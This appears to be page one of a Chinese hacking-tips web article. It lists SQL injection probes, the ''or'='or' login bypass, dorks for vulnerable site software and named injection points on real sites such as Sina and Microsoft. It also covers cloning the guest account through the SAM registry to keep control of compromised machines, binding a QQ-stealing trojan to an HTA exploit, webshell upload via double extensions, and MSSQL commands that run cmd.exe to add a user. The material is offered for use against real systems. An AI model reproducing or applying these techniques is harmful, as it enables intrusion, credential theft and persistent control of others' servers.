2.搜索栏里输入

　　关键字%’and 1=1 and ’%’=’

　　关键字%’and 1=2 and ’%’=’

　　比较不同处 可以作为注入的特征字符

　　3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是

　　4.我们先到www.google.com底下搜索一下Co Net MIB Ver 1.0

　　密码帐号都是 ’or’=’or’

　　5.挂马代码

　　6.http://www.XXX.com/24小时挂QQ工具

　　7.开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,

　　net localgroup administrators还是可以看出Guest是管理员来

　　7.只要敢想,新浪也可入侵 注入点

　　http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59

　　微软官方网站注入点

　　http://www.microsoft.com/library/toolbar/3.0/search.aspx?View=en-us&;charset=iso-8859-1&qu=

　　8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马

　　9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器

　　SQL注入后，如何上传木马,

　　文章地址 http://hack123.home4u.china.com/0601.htm

　　10.QQ强制聊天代码

　　http://wpa.qq.com/msgrd?V=1&Uin=对方的qq号&Site=ioshenmue&Menu=yes

　　使用方法：把代码中的红色的“********”星号换成你想与其聊天的QQ号后复 制到浏览器的地址栏处即可。无论他是否你的好友，你无须加他为好友就能给 他发QQ消息。

　　11. mybbs论坛cookie欺骗 后台备份马

　　12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等

　　用法: 安装： instsrv.exe 服务名称 路径

　　卸载： instsrv.exe 服务名称 REMOVE

　　13.以动网为例数据库查找DV_LOG,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%B7%E7%A4%CE%B0%D7%D2%C2&password2=01180017&username1=%B7%E7%A4%CE%B0%D7%D2%C2&Submit=%CC%ED+%BC%D3 password2=01180017就是他的登陆密码

　　14.搜索的技巧 inurl:网址

　　15.启航工作室WMS 5.0网站程序漏洞

　　在baidu 搜索Powered by: SailingStudio Website Manage System 5.0 (SP1)

　　利用动画看http://soft.anqn.com/62/20050530/6824.html

　　16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

　　17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/

　　工具下载www.anqn.com

　　地址栏里，填上天意商务系统的网址就可以了，注意一定要是主页面

　　18.SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉

　　不能注入时要第一时间想到%5c暴库

　　19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽，几乎发现不了

　　工具使用方法动画和所有文件

　　http://www.anqn.com/bbs/printpage.asp?BoardID=2&;ID=811

　　20.缺少xp_cmdshell时

　　尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

　　假如恢复不成功,可以尝试直接加用户(针对开3389的)

　　declare @o int

　　exec sp_oacreate ’wscript.shell’,@o out

　　exec sp_oamethod @o,’run’,NULL,’cmd.exe /c net user ating ating /add’ 再提到管理员

[1] [2] [3]  下一页